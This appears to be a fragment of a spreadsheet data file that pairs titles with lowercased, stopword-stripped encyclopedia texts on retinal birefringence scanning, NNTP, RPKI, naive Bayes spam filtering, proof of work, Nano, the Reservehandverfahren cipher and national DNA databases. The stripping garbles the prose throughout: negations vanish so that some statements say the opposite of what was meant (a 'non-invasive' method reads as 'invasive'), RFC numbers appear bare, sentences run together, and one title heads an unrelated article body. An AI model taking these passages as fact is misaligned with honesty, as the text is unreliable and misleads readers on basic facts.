also vein matching iris recognition references</t>
  </si>
  <si>
    <t>Retinal birefringence scanning</t>
  </si>
  <si>
    <t>retinal birefringence scanning (rbs) method detection central fixation eye. method used pediatric ophthalmology screening purposes. simultaneously measuring central fixation eyes, small- large-angle strabismus detected. method invasive requires little cooperation patient, used detecting strabismus young children. method provides reliable detection strabismus also used detecting certain kinds amblyopia. uses human eye's birefringent properties identify position fovea direction gaze, thereby measure binocular misalignment. principle birefringent material refractive index depends polarization state propagation direction light. main contribution birefringence stems henle fibers. these fibers (named friedrich gustav jakob henle) photoreceptor axons arranged radially symmetric pattern, extending outward fovea, sensitive part retina. when polarized light strikes fovea, layer henle fibers produces characteristic pattern, strength contrast pattern, well orientation bright parts, depend polarization light reaches retina. analysis pattern allows position fovea direction gaze determined.binocular used diagnosing strabismus (including microstrabismus) young children, also proposed diagnosing amblyopia detecting strabismus detecting reduced fixation accuracy. limitations however, also birefringent properties cornea retinal nerve fiber layer sources birefringence. corneal birefringence varies widely individual another, well location another individual, thus confound measurements. references</t>
  </si>
  <si>
    <t>NNTPS</t>
  </si>
  <si>
    <t>network news transfer protocol (nntp) application protocol used transporting usenet news articles (netnews) news servers, reading/posting articles user client applications. brian kantor university california, diego, phil lapsley university california, berkeley, wrote 977, specification network news transfer protocol, march 1986. other contributors included stan barber baylor college medicine erik fair apple computer. usenet originally designed based uucp network, article transfers taking place direct point-to-point telephone links news servers, powerful time-sharing systems. readers posters logged computers reading articles directly local disk. local area networks internet participation proliferated, became desirable allow newsreaders personal computers connected local networks. resulting protocol nntp, resembled simple mail transfer protocol (smtp) tailored exchanging newsgroup articles. newsreader, also known news client, software application reads articles usenet, either directly news server's disks nntp. well-known port reserved nntp. well-known port (nnsp) used bulk transfer articles server another. when clients connect news server transport layer security (tls), port often used. this sometimes referred nntps. alternatively, plain-text connection port changed starttls command. october 2006, ietf released 3977 updates nntp codifies many additions made years since 977. time, ietf also released 4642 specifies transport layer security (tls) nntp starttls. network news reader protocol during abortive attempt update nntp standard early 1990s, specialized form nntp intended specifically clients, nnrp, proposed. this protocol never completed fully implemented, name persisted internetnews's (inn) nnrpd program. result, subset standard nntp commands useful clients sometimes still referred "nnrp". nntp server software leafnode internetnews news apache james synchronet yproxy also list usenet newsreaders news server usenet newsgroup external links kantor, brian phil lapsley. "network news transfer protocol: proposed standard stream-based transmission news." 1986. horton, mark, adams. 1036 "standard interchange usenet messages." 1987. barber, stan, 2980 "common nntp extensions." 2000 ietf nntpext working group feather, clive. 3977 "network news transfer protocol (nntp)." 2006 murchison, vinocur, newman. 4642 "using transport layer security (tls) network news transfer protocol (nntp)" 2006 usenet server programs curlie public news servers curlie</t>
  </si>
  <si>
    <t>Resource Public Key Infrastructure</t>
  </si>
  <si>
    <t>resource public infrastructure (rpki), also known resource certification, specialized public infrastructure (pki) framework support improved security internet's routing infrastructure. rpki provides connect internet number resource information (such autonomous system numbers addresses) trust anchor. certificate structure mirrors internet number resources distributed. that resources initially distributed iana regional internet registries (rirs), turn distribute local internet registries (lirs), distribute resources customers. rpki used legitimate holders resources control operation internet routing protocols prevent route hijacking attacks. particular, rpki used secure border gateway protocol (bgp) route origin validation (rov), well neighbor discovery protocol (nd) ipv6 secure neighbor discovery protocol (send). rpki architecture documented 6480. rpki specification documented spread series rfcs: 6481, 6482, 6483, 6484, 6485, 6486, 6487, 6488, 6489, 6490, 6491, 6492, 6493. send documented 6494 6495. these rfcs product ietf's sidr working group, based threat analysis documented 4593. these standards cover origin validation, path validation provided bgpsec, standardized separately 8205. several implementations prefix origin validation already exist. resource certificates child objects rpki uses x.509 certificates (rfc 5280) extensions addresses identifiers (rfc 3779). allows members regional internet registries, known local internet registries (lirs), obtain resource certificate listing internet number resources hold. this offers validatable proof holdership, though certificate contain identity information. using resource certificate, lirs create cryptographic attestations route announcements authorise made prefixes hold. these attestations, called route origination authorizations (roas), described below. route origination authorizations route origination authorization (roa) states autonomous system (as) authorised originate certain prefixes. addition, determine maximum length prefix authorised advertise. maximum prefix length maximum prefix length optional field. when defined, authorised advertise exactly prefix specified. specific announcement prefix considered invalid. this enforce aggregation prevent hijacking announcement specific prefix. when present, specifies length specific prefix authorised advertise. example, address prefix 10.0.0.0/16 maximum length authorised advertise prefix 10.0.0.0/16, long specific /22. example, would authorised advertise 10.0.0.0/16, 10.0.128.0/20 10.0.252.0/22, 10.0.255.0/24. rpki route announcement validity when created certain combination origin prefix, effect rpki validity route announcements. they valid route announcement covered least invalid prefix announced unauthorised this means: there prefix another authorising this could hijacking attempt announcement specific allowed maximum length matches prefix unknown prefix announcement covered partially covered) existing roanote invalid updates also incorrectly configured roas. management there open source tools available certificate authority manage resource certificate child objects roas. addition, rirs hosted rpki platform available member portals. this allows lirs choose rely hosted system, software. publication system single repository publication point publish rpki objects. instead, rpki repository system consists multiple distributed delegated repository publication points. each repository publication point associated rpki certificates' publication points. practice means running certificate authority, either publish cryptographic material themselves, rely third party publication. when chooses hosted system provided rir, principle publication done repository. validation relying party software fetch, cache, validate repository data using rsync rpki repository delta protocol (rfc 8182). important relying party regularly synchronize publication points maintain complete timely view repository data. incomplete stale data lead erroneous routing decisions. routing decisions after validation roas, attestations compared routing network operators decision making process. this done manually, validated prefix origin data also sent supported router using rpki router protocol (rfc 6810), cisco systems offers native support many platforms fetching rpki data using router configuration. juniper offers support platforms version 12.2 newer. quagga obtains functionality secure routing extensions (bgp-srx) rpki implementation fully rfc-compliant based rtrlib. rtrlib provides open source implementation protocol prefix origin verification. library useful developers routing software also network operators. developers integrate rtrlib daemon extend implementation towards rpki. network operators rtrlib develop monitoring tools (e.g., check proper operation caches evaluate performance). 6494 updates certificate validation method secure neighbor discovery protocol (send) security mechanisms neighbor discovery protocol (nd) rpki ipv6. defines send certificate profile utilizing modified 6487 rpki certificate profile must include single 3779 address delegation extension. references external links tool provided cloudflare test rpki validation tool cloudflare explore rpki open source rpki documentation ietf journal securing sidr open source implementation complete rpki protocols tools rtrlib open source rpki-router client library nlnet labs open source rpki tools developed rust quagga rpki implementation bgp-srx quagga router implementation rpki-based origin path validation. rpki-monitor global regional monitoring analysis rpki deployment use. rpki deployment statistics rirs global deployment heatmap eurotransit gmbh rpki testbed bgpmon validating announcement rpki apnic primer rpki ripe resource certification (rpki) information lacnic rpki information arin rpki information statement rpki internet architecture board statement rpki building governance hierarchy: rpki future internet routing addressing secure border gateway protocol (secure-bgp) rpki router implementation report</t>
  </si>
  <si>
    <t>Naive Bayes spam filtering</t>
  </si>
  <si>
    <t>naive bayes classifiers popular statistical technique e-mail filtering. they typically bag-of-words features identify email spam, approach commonly used text classification. naive bayes classifiers work correlating tokens (typically words, sometimes things), spam non-spam e-mails using bayes' theorem calculate probability email spam. naive bayes spam filtering baseline technique dealing spam tailor email needs individual users give false positive spam detection rates generally acceptable users. oldest ways spam filtering, roots 1990s. history bayesian algorithms used email filtering early 1996. although naive bayesian filters become popular later, multiple programs released 1998 address growing problem unwanted email. first scholarly publication bayesian spam filtering sahami 1998. that work soon thereafter deployed commercial spam filters.variants basic technique implemented number research works commercial software products. many modern mail clients implement bayesian spam filtering. users also install separate email filtering programs. server-side email filters, dspam, spamassassin, spambayes, bogofilter assp, make bayesian spam filtering techniques, functionality sometimes embedded within mail server software itself. crm114, cited bayesian filter, intended bayes filter production, includes ″unigram″ feature reference. process particular words particular probabilities occurring spam email legitimate email. instance, email users frequently encounter word "viagra" spam email, seldom email. filter know probabilities advance, must first trained build train filter, user must manually indicate whether email spam not. words training email, filter adjust probabilities word appear spam legitimate email database. instance, bayesian spam filters typically learned high spam probability words "viagra" "refinance", spam probability words seen legitimate email, names friends family members. after training, word probabilities (also known likelihood functions) used compute probability email particular words belongs either category. each word email contributes email's spam probability, interesting words. this contribution called posterior probability computed using bayes' theorem. then, email's spam probability computed words email, total exceeds certain threshold (say 95%), filter mark email spam. spam filtering technique, email marked spam automatically moved "junk" email folder, even deleted outright. some software implement quarantine mechanisms define time frame user allowed review software's decision. initial training usually refined wrong judgements software identified (false positives false negatives). that allows software dynamically adapt ever-evolving nature spam. some spam filters combine results bayesian spam filtering heuristics (pre-defined rules contents, looking message's envelope, etc.), resulting even higher filtering accuracy, sometimes cost adaptiveness. mathematical foundation bayesian email filters utilize bayes' theorem. bayes' theorem used several times context spam: first time, compute probability message spam, knowing given word appears message; second time, compute probability message spam, taking consideration words relevant subset them); sometimes third time, deal rare words. computing probability message containing given word spam let's suppose suspected message contains word "replica". most people used receiving e-mail know message likely spam, precisely proposal sell counterfeit copies well-known brands watches. spam detection software, however, "know" facts; compute probabilities. formula used software determine that, derived bayes' theorem {\displaystyle \pr(s|w)={\frac {\pr(w|s)\cdot \pr(s)}{\pr(w|s)\cdot \pr(s)+\pr(w|h)\cdot \pr(h)}}} where: {\displaystyle \pr(s|w)} probability message spam, knowing word "replica" {\displaystyle \pr(s)} overall probability given message spam; {\displaystyle \pr(w|s)} probability word "replica" appears spam messages; {\displaystyle \pr(h)} overall probability given message spam "ham"); {\displaystyle \pr(w|h)} probability word "replica" appears messages.(for full demonstration, bayes' theorem#extended form.) spamliness word statistics show current probability message spam 80%, least: {\displaystyle \pr(s)=0.8;\pr(h)=0.2} however, bayesian spam detection software makes assumption priori reason incoming message spam rather ham, considers cases equal probabilities 50%: {\displaystyle \pr(s)=0.5;\pr(h)=0.5} filters hypothesis said "not biased", meaning prejudice regarding incoming email. this assumption permits simplifying general formula {\displaystyle \pr(s|w)={\frac {\pr(w|s)}{\pr(w|s)+\pr(w|h)}}} this functionally equivalent asking, "what percentage occurrences word "replica" appear spam messages?" this quantity called "spamicity" "spaminess") word "replica", computed. number {\displaystyle \pr(w|s)} used formula approximated frequency messages containing "replica" messages identified spam learning phase. similarly, {\displaystyle \pr(w|h)} approximated frequency messages containing "replica" messages identified learning phase. approximations make sense, learned messages needs representative enough. also advisable learned messages conforms hypothesis repartition spam ham, i.e. datasets spam size.of course, determining whether message spam based presence word "replica" error-prone, bayesian spam software tries consider several words combine spamicities determine message's overall probability spam. combining individual probabilities most bayesian spam filtering algorithms based formulas strictly valid (from probabilistic standpoint) words present message independent events. this condition generally satisfied (for example, natural languages like english probability finding adjective affected probability noun), useful idealization, especially since statistical correlations individual words usually known. basis, derive following formula bayes' theorem: {\displaystyle p={\frac {p_{1}p_{2}\cdots p_{n}}{p_{1}p_{2}\cdots p_{n}+(1-p_{1})(1-p_{2})\cdots (1-p_{n})}}} where: {\displaystyle probability suspect message spam; {\displaystyle p_{1}} probability {\displaystyle p(w_{1}|s)} first word (for example "replica") appears, given message spam; {\displaystyle p_{2}} probability {\displaystyle p(w_{2}|s)} second word (for example "watches") appears, given message spam; etc...spam filtering software based formula sometimes referred naive bayes classifier, "naive" refers strong independence assumptions features. result typically compared given threshold decide whether message spam not. lower threshold, message considered likely ham, otherwise considered likely spam. other expression formula combining individual probabilities usually directly computed using formula floating-point underflow. instead, computed domain rewriting original equation follows: {\displaystyle {\frac {1}{p}}-1={\frac {(1-p_{1})(1-p_{2})\dots (1-p_{n})}{p_{1}p_{2}\dots p_{n}}}} taking logs sides: {\displaystyle \left({\frac {1}{p}}-1\right)=\sum _{i=1}^{n}\left[\ln(1-p_{i})-\ln p_{i}\right]} {\displaystyle \eta =\sum _{i=1}^{n}\left[\ln(1-p_{i})-\ln p_{i}\right]} therefore, {\displaystyle {\frac {1}{p}}-1=e^{\eta hence alternate formula computing combined probability: {\displaystyle p={\frac {1}{1+e^{\eta }}}} dealing rare words case word never learning phase, numerator denominator equal zero, general formula spamicity formula. software decide discard words information available. more generally, words encountered times learning phase cause problem, would error trust blindly information provide. simple solution simply avoid taking unreliable words account well. applying bayes' theorem, assuming classification spam emails containing given word ("replica") random variable beta distribution, programs decide corrected probability: {\displaystyle '(s|w)={\frac {s\cdot \pr(s)+n\cdot \pr(s|w)}{s+n}}} where: {\displaystyle '(s|w)} corrected probability message spam, knowing contains given word {\displaystyle strength give background information incoming spam {\displaystyle \pr(s)} probability incoming message spam {\displaystyle number occurrences word learning phase {\displaystyle \pr(s|w)} spamicity word.(demonstration:) this corrected probability used instead spamicity combining formula. {\displaystyle \pr(s)} taken equal 0.5, avoid suspicious incoming email. good value meaning learned corpus must contain messages word confidence spamicity value default value. this formula extended case equal zero (and spamicity defined), evaluates case {\displaystyle pr(s)} other heuristics "neutral" words like "the", "a", "some", "is" english), equivalents languages, ignored. more generally, bayesian filtering filters simply ignore words spamicity next 0.5, contribute little good decision. words taken consideration whose spamicity next (distinctive signs legitimate messages), next (distinctive signs spam). method example keep words, examined message, greatest absolute value |0.5 pi|. some software products take account fact given word appears several times examined message, others don't. some software products patterns (sequences words) instead isolated natural languages words. example, "context window" four words, compute spamicity "viagra good for", instead computing spamicities "viagra", "is", "good", "for". this method gives sensitivity context eliminates bayesian noise better, expense bigger database. mixed methods there ways combining individual probabilities different words using "naive" approach. these methods differ assumptions make statistical properties input data. these different hypotheses result radically different formulas combining individual probabilities. example, assuming individual probabilities follow chi-squared distribution degrees freedom, could formula: {\displaystyle p=c^{-1}(-2\ln(p_{1}p_{2}\cdots p_{n}),2n)\,} inverse chi-squared function. individual probabilities combined techniques markovian discrimination too. discussion advantages main advantages bayesian spam filtering trained per-user basis. spam user receives often related online user's activities. example, user subscribed online newsletter user considers spam. this online newsletter likely contain words common newsletters, name newsletter originating email address. bayesian spam filter eventually assign higher probability based user's specific patterns. legitimate e-mails user receives tend different. example, corporate environment, company name names clients customers mentioned often. filter assign lower spam probability emails containing names. word probabilities unique user evolve time corrective training whenever filter incorrectly classifies email. result, bayesian spam filtering accuracy training often superior pre-defined rules. perform particularly well avoiding false positives, legitimate email incorrectly classified spam. example, email contains word "nigeria", frequently used advance fraud spam, pre-defined rules filter might reject outright. bayesian filter would mark word "nigeria" probable spam word, would take account important words usually indicate legitimate e-mail. example, name spouse strongly indicate e-mail spam, could overcome word "nigeria." disadvantages depending implementation, bayesian spam filtering susceptible bayesian poisoning, technique used spammers attempt degrade effectiveness spam filters rely bayesian filtering. spammer practicing bayesian poisoning send emails large amounts legitimate text (gathered legitimate news literary sources). spammer tactics include insertion random innocuous words normally associated spam, thereby decreasing email's spam score, making likely slip past bayesian spam filter. however, (for example) paul graham's scheme significant probabilities used, padding text non-spam-related words affect detection probability significantly. words normally appear large quantities spam also transformed spammers. example, «viagra» would replaced «viaagra» «v!agra» spam message. recipient message still read changed words, words rarely bayesian filter, hinders learning process. general rule, spamming technique work well, derived words recognized filter like normal ones.another technique used defeat bayesian spam filters replace text pictures, either directly included linked. whole text message, part replaced picture text "drawn". spam filter usually unable analyze picture, would contain sensitive words like «viagra». however, since many mail clients disable display linked pictures security reasons, spammer sending links distant pictures might reach fewer targets. also, picture's size bytes bigger equivalent text's size, spammer needs bandwidth send messages directly including pictures. some filters inclined decide message spam mostly graphical contents. solution used google gmail email system perform (optical character recognition) every large size image, analyzing text inside. general applications bayesian filtering while bayesian filtering used widely identify spam email, technique classify "cluster") almost sort data. uses science, medicine, engineering. example general purpose classification program called autoclass originally used classify stars according spectral characteristics otherwise subtle notice. also anti-spam techniques bayesian poisoning email filtering markovian discrimination mozilla thunderbird mail client native implementation bayes filters references</t>
  </si>
  <si>
    <t>Nakamoto consensus</t>
  </si>
  <si>
    <t>proof work (pow) form cryptographic proof party (the prover) proves others (the verifiers) certain amount specific computational effort expended. verifiers subsequently confirm expenditure minimal effort part. concept invented moni naor cynthia dwork 1993 deter denial-of-service attacks service abuses spam network requiring work service requester, usually meaning processing time computer. term "proof work" first coined formalized 1999 paper markus jakobsson juels. proof work later popularized bitcoin foundation consensus permissionless decentralized network, miners compete append blocks mint currency, miner experiencing success probability proportional computational effort expended. (proof stake) best known sybil deterrence mechanisms. context cryptocurrencies common mechanisms.a feature proof-of-work schemes asymmetry: work computation must moderately hard (yet feasible) prover requester side easy check verifier service provider. this idea also known cost function, client puzzle, computational puzzle, pricing function. another common feature built-in incentive-structures reward allocating computational capacity network value form money.the purpose proof-of-work algorithms proving certain work carried computational puzzle "solved", deterring manipulation data establishing large energy hardware-control requirements able proof-of-work systems criticized environmentalists energy consumption. background popular system, used hashcash, uses partial hash inversions prove computation done, goodwill token send e-mail. instance, following header represents hash computations send message calvin@comics.net january 2038: x-hashcash: 1:52:380119:calvin@comics.net:::9b760005e92f0dae verified single computation checking sha-1 hash stamp (omit header name x-hashcash: including colon amount whitespace following digit '1') begins binary zeros, hexadecimal zeros:[1] 0000000000000756af69e2ffbdb930261873cd71 whether systems actually solve particular denial-of-service issue spam problem subject debate; system must make sending spam emails obtrusively unproductive spammer, also prevent legitimate users sending messages. words, genuine user encounter difficulties sending email, email spammer would expend considerable amount computing power send many emails once. proof-of-work systems used other, complex cryptographic systems bitcoin, uses system similar hashcash. variants there classes proof-of-work protocols. challenge–response protocols assume direct interactive link requester (client) provider (server). provider chooses challenge, item property, requester finds relevant response set, sent back checked provider. challenge chosen spot provider, difficulty adapted current load. work requester side bounded challenge-response protocol known solution (chosen provider), known exist within bounded search space. solution–verification protocols assume link: result, problem must self-imposed solution sought requester, provider must check problem choice found solution. most schemes unbounded probabilistic iterative procedures hashcash. known-solution protocols tend slightly lower variance unbounded probabilistic protocols variance rectangular distribution lower variance poisson distribution (with mean). generic technique reducing variance multiple independent sub-challenges, average multiple samples lower variance. there also fixed-cost functions time-lock puzzle. moreover, underlying functions used schemes cpu-bound computation runs speed processor, greatly varies time, well high-end server low-end portable devices. memory-bound computation speed bound main memory accesses (either latency bandwidth), performance expected less sensitive hardware evolution. network-bound client must perform computations, must collect tokens remote servers querying final service provider. sense, work actually performed requester, incurs delays anyway latency required tokens.finally, systems offer shortcut computations allow participants know secret, typically private key, generate cheap pows. rationale mailing-list holders generate stamps every recipient without incurring high cost. whether feature desirable depends usage scenario. list proof-of-work functions here list known proof-of-work functions: integer square root modulo large prime weaken fiat–shamir signatures ong–schnorr–shamir signature broken pollard partial hash inversion this paper formalizes idea proof work introduces "the dependent idea bread pudding protocol", "re-usable proof-of-work" (rpow) system. hash sequences puzzles diffie-hellman–based puzzle moderate mbound hokkaido cuckoo cycle merkle tree–based guided tour puzzle protocol reusable proof-of-work computer scientist finney built proof-of-work idea, yielding system exploited reusable proof work (rpow). idea making proofs work reusable practical purpose already established 1999. finney's purpose rpow token money. just gold coin's value linked gold mining cost, value rpow token guaranteed value real-world resources required 'mint' token. finney's version rpow, token piece hashcash. website demand token exchange service. requiring token users would inhibit frivolous excessive service, sparing service's underlying resources, bandwidth internet, computation, disk space, electricity, administrative overhead. finney's rpow system differed system permitting random exchange tokens without repeating work required generate them. after someone "spent" token website, website's operator could exchange "spent" token new, unspent rpow token, could spent third-party website similarly equipped accept rpow tokens. this would save resources otherwise needed 'mint' token. anti-counterfeit property rpow token guaranteed remote attestation. rpow server exchanges used rpow token equal value uses remote attestation allow interested party verify software running rpow server. since source code finney's rpow software published (under bsd-like license), sufficiently knowledgeable programmer could, inspecting code, verify software (and, extension, rpow server) never issued token except exchange spent token equal value. until 2009, finney's system rpow system implemented; never economically significant use. rpow protected private keys. those keys stored trusted platform module (tpm) hardware manufacturers holding private keys. stealing manufacturer's obtaining examining chip would subvert assurance. bitcoin-type proof work 2009, bitcoin network went online. bitcoin proof-of-work digital currency that, like finney's rpow, also based hashcash pow. bitcoin, double-spend protection provided decentralized protocol tracking transfers coins, rather hardware trusted computing function used rpow. bitcoin better trustworthiness protected computation. bitcoins "mined" using hashcash proof-of-work function individual miners verified decentralized nodes bitcoin network. difficulty periodically adjusted keep block time around target time. energy consumption since creation bitcoin, proof-of-work predominant design peer-to-peer cryptocurrency. studies estimated total energy consumption cryptocurrency mining. mechanism requires vast amount computing resources, consume significant amount electricity. 2018 estimates university cambridge bitcoin’s energy consumption equal switzerland. history modification each block added blockchain, starting block containing given transaction, called confirmation transaction. ideally, merchants services receive payment cryptocurrency wait least confirmation distributed network, assuming payment done. confirmations merchant waits for, difficult attacker successfully reverse transaction blockchain—unless attacker controls half total network power, case called attack. asics mining pools within bitcoin community groups working together mining pools. some miners application-specific integrated circuits (asics) pow. this trend toward mining pools specialized asics made mining cryptocurrencies economically infeasible players without access latest asics, nearby sources inexpensive energy, special advantages.some pows claim asic-resistant, i.e. limit efficiency gain asic commodity hardware, like gpu, well order magnitude. asic resistance advantage keeping mining economically feasible commodity hardware, also contributes corresponding risk attacker briefly rent access large amount unspecialized commodity processing power launch attack cryptocurrency. environmental concerns these miners compete solve crypto challenges bitcoin blockchain, solutions must agreed upon nodes reach consensus. solutions used validate transactions, blocks generate bitcoins. miners rewarded solving puzzles successfully adding blocks. however, bitcoin-style mining process energy intensive proof work shaped like lottery mechanism. underlying computational work use. miners waste energy block containing transaction blockchain. also, miners invest computer hardwares need large spaces fixed cost.in january 2022 vice-chair european securities markets authority erik thedéen called proof work model favor proof stake model lower energy emissions. also bitcoin bitmessage cryptocurrency proof authority proof burn proof personhood proof space proof stake proof elapsed time ouroboros (protocol) consensus (computer science) notes unix systems verified echo 1:52:380119:calvin@comics.net:::9b760005e92f0dae openssl sha1 references external links finney's system wayback machine (archived december 2007) gold gold. describes complete money system (including generation, storage, assay, transfer) based proof work functions machine architecture problem raised functions. merkle proof standardised format simplified payment verification (spv).</t>
  </si>
  <si>
    <t>Nano (cryptocurrency)</t>
  </si>
  <si>
    <t>nano peer-to-peer open-source cryptocurrency. currency based directed acyclic graph data structure distributed ledger, making possible nano work without intermediaries. agree transactions commit (i.e. achieving consensus), uses system called "open representative voting" weight based amount currency accounts hold.nano launched october 2015 colin lemahieu address bitcoin scalability problem. solving problem means transaction fees confirmation time load decreased. currency implements no-fee transactions achieves confirmation second. history colin lemahieu started development nano 2014 original name "raiblocks". year later, raiblocks distributed free captcha-secured faucet. 2017, 126,248,289 raiblocks distributed, faucet shut down. this fixed total supply 133,248,297 raiblocks, addition 7,000,000 raiblocks developer fund. bitgrail hack month later, february 2018, italian cryptocurrency exchange bitgrail announced hack eventual shutdown. users prevented accessing assets stored platform, collectively worth million nano. victims launched class-action lawsuit bitgrail owner francesco firano recoupment, inside florence courthouse. exchange ruled found guilty january 2019, found fail implementing safeguards reporting losses. design nano uses block-lattice data structure, every account blockchain storing transactions. first cryptocurrency directed acyclic graph data structure, "block" consisting transaction account's current balance.consensus reached algorithm similar proof stake named open representative voting. system, voting weight distributed accounts based amount nano hold; accounts freely delegate weight peer (node) choice. mining cryptocurrency needed.if contradictory transactions broadcast network, indicating double-spend attempt, nodes vote either transactions. afterwards, broadcast vote nodes strictly informational purpose. first reach total voting weight confirmed, transaction discarded. references</t>
  </si>
  <si>
    <t>Residual block termination</t>
  </si>
  <si>
    <t>cryptography, residual block termination variation cipher block chaining mode (cbc) require padding. effectively changing cipher feedback mode block. cost increased complexity. encryption procedure plaintext length multiple block size encrypt ⌊n/l⌋ full blocks plaintext using cipher block chaining mode; encrypt last full encrypted block again; remaining bits plaintext leftmost bits re-encrypted block. decryption procedure decrypt ⌊n/l⌋ full encrypted blocks using cipher block chaining mode; encrypt last full encrypted block; remaining bits ciphertext leftmost bits re-encrypted block. short message messages shorter block, residual block termination encrypted instead previously encrypted block.</t>
  </si>
  <si>
    <t>NLS (cipher)</t>
  </si>
  <si>
    <t>cryptography, stream cypher algorithm designed gregory rose, philip hawkes, michael paddon, miriam wiggers vries. submitted estream project ecrypt network.</t>
  </si>
  <si>
    <t>Reservehandverfahren</t>
  </si>
  <si>
    <t>reservehandverfahren (rhv) (english: reserve hand procedure) german naval world hand-cipher system used backup method working enigma machine available.the cipher stages: transposition followed bigram substitution. transposition stage, cipher clerk would write plaintext "cage" shape piece paper. pairs letters substituted using bigram tables.the reservehandverfahren cipher first solved bletchley park june 1941 means documents captured u-boat u-110 previous month. thereafter solved using cryptanalysis three years. some 1,400 signals read period. section working headed historian john plumb. decrypts sometimes useful intelligence contained, important source cribs solving naval enigma.a mediterranean variant known schlüssel henno, first tackled unsuccessfully 1943. capture cipher documents raid mykonos april 1944 naval section able read henno. with 1,000 signals month, people assigned solve messages. separate version existed u-boats use, called offizier. only messages offizier broken bletchley park, three james hogarth. work abandoned august 1944 found intelligence value decrypts "rather disappointing". also werftschlüssel sources external links detailed description german reservehandverfahren (r.h.v.) m.dv.nr. 929/1 scanned cover 1940 reservehandverfahren manual archives german technical manuals 1900-1945 (includes reservehandverfahren manual)</t>
  </si>
  <si>
    <t>National DNA Data Bank of Canada</t>
  </si>
  <si>
    <t>national data bank canada (nddb) national database 2000. managed rcmp, provide matches convicted offenders offer memory repository cold cases. history first analysis canada investigative purposes april 1989. rcmp utilized method investigation sexual assault ottawa, ontario. suspect case denied allegations made victim. subsequent forensic analysis confirmed suspect perpetrator.in 1995, bill c-104 unanimously passed parliament. this enabled provincial court judges issue police warrants obtaining biological samples suspects criminal investigation.in 1998, identification enacted parliament. established governing creation administration national database. updated criminal code allow judge authorize collection bodily substances person found guilty designated offences. same year, swissair flight disaster, special typing task force rcmp used technology help identify human remains.in 2000, national data bank officially launched. legislation enabled time, allowed military judges make post-conviction data bank orders. national missing persons program national missing persons program (nmpdp) initiative established royal canadian mounted police 2018 support missing persons unidentified remains investigations. database currently holds 500,000 profiles. references external links national data bank national missing persons program</t>
  </si>
  <si>
    <t>National DNA database</t>
  </si>
  <si>
    <t>database databank database profiles used analysis genetic diseases, genetic fingerprinting criminology, genetic genealogy. databases public private, largest ones national databases. databases often employed forensic investigations. when match made national database link crime scene person whose profile stored database, link often referred cold hit. cold particular value linking specific person crime scene, less evidential value match made without database. research shows databases criminal offenders reduce crime rates. types forensic forensic database centralized database storing profiles individuals enables searching comparing samples collected crime scene stored profiles. important function forensic database produce matches suspected individual crime scene bio-markers, provides evidence support criminal investigations, also leads identify potential suspects criminal investigation. majority national databases used forensic purposes.the interpol database used criminal investigations. interpol maintains automated database called gateway contains profiles submitted member countries collected crime scenes, missing persons, unidentified bodies. gateway established 2002, 2013, 140,000 profiles member countries. unlike databases, gateway used information sharing comparison, link profile individual, physical psychological conditions individual included database. genealogical national forensic database available non-police purposes. profiles also used genealogical purposes, separate genetic genealogy database needs created stores profiles genealogical test results. genbank public genetic genealogy database stores genome sequences submitted many genetic genealogists. until now, genbank contained large number sequences gained 140,000 registered organizations, updated every ensure uniform comprehensive collection sequence information. these databases mainly obtained individual laboratories large-scale sequencing projects. files stored genbank divided different groups, (bacterial), (viruses), (primates)...etc. people access genbank ncbi's retrieval system, “blast” function identify certain sequence within genbank find similarities sequences. medical medical database database medically relevant genetic variations. collects individual's reflect medical records lifestyle details. through recording profiles, scientists find interactions genetic environment occurrence certain diseases (such cardiovascular disease cancer), thus finding drugs effective treatments controlling diseases. often collaborated national health service. national national database database maintained government storing profiles population. each profile based uses (short tandem repeats) analysis. they generally used forensic purposes includes searching matching profiles potential criminal suspects.in 2009 interpol reported police national databases world time countries planned start one. europe interpol reported national databases planned. european network forensic science institutes (enfsi) working group made recommendations 2014 database management guidelines auditing databases. other countries adopted privately developed databases, qatar, adopted bode dbsearch.typically, tiny subset individual's genome sampled regions high individuation. united kingdom first national database united kingdom established april 1995, called national database (ndnad). 2006, contained million profiles (about 5.2% population), well information individuals crime scenesi 2020 million profiles (5.6 million individuals excluding duplicates). information stored form digital code, based nomenclature str. 1995 database originally markers profile, 1999 markers, 2014, core markers gender identifier. scotland used loci, y-dna markers gender identifier since 2014. police wide-ranging powers take samples retain subject convicted recordable offence. large amount profiles stored ndnad, "cold hits" happen matching, means finding unexpected match individual's profile unsolved crime-scene profile. this introduce suspect investigation, thus helping solve cases.in england wales, anyone arrested suspicion recordable offence must submit sample, profile stored database. those charged found guilty data deleted within specified period time. scotland, similarly requires profiles people acquitted removed database. zealand zealand second country database. 2019 zealand profile databank held 40,000 profiles 200,000 samples. united states united states national database called combined index system (codis). maintained three levels: national, state local. each level implemented index system. national index system (ndis) allows profiles exchanged compared participated laboratories nationally. each state index system (sdis) allows profiles exchanged compared laboratories various states local index system (ldis) allows profiles collected local sites uploaded sdis ndis. codis software integrates connects index systems three levels. codis installed participating laboratory site uses standalone network known criminal justice information systems wide area network (cjis wan) connect laboratories. order decrease number irrelevant matches ndis, convicted offender index requires codis strs present profile upload. forensic profiles require strs present upload. 2011, million records held within codis. march 2011, 361,176 forensic profiles 9,404,747 offender profiles accumulated, making largest database world. date, codis produced 138,700 matches requests, assisting 133,400 investigations.the growing public approval databases seen creation expansion many states' databases. political measures california proposition (2004), increased scope database, already significant increase numbers investigations aided. forty-nine states usa, apart idaho, store profiles violent offenders, many also store profiles suspects. 2017 study showed databases u.s. states "deter crime profiled offenders, reduce crime rates, cost-effective traditional enforcement tools".codis also used help find missing persons identify human remains. connected national missing persons database; samples provided family members sequenced university north texas center human identification, also runs national missing unidentified persons system. untchi sequence nuclear mitochondrial dna.the department defense maintains database identify remains service members. department defense serum repository maintains 50,000,000 records, primarily assist identification human remains. submission samples mandatory servicemen, database also includes information military dependents. national defense authorization 2003 provided means federal courts military judges order information collected made available purpose investigation prosecution felony, sexual offense, source information reasonably available. australia australian national database called national criminal investigation database (ncidd). july 2018, contained 837,000+ profiles. database used loci gene analysis, increased core markers 2013. ncidd combines forensic data, including profiles, advanced bio-metrics cold cases. canada canadian national database called national data bank (nddb) established 1998 first used 2000. legislation parliament enacted govern technology within criminal justice system found canadian courts respectful constitutional privacy rights suspects, persons found guilty designated offences.on december 1999, canadian government agreed upon identification act. this would allow canadian data bank created amended criminal code. this provides mechanism judges request offender provide blood, buccal swabs, hair samples profiles. this legislation became official june 2000. canadian police using forensic evidence decade. become powerful tools available enforcement agencies administration justice.nddb consists indexes: convicted offender index (coi) national crime scene index (csi-nat). there also local crime scene index (csi-loc) maintained local laboratories nddb local profiles meet nddb collection criteria. another national crime scene index (csi-nat) collection three labs operated royal canadian mounted police (rcmp), laboratory sciences judiciary 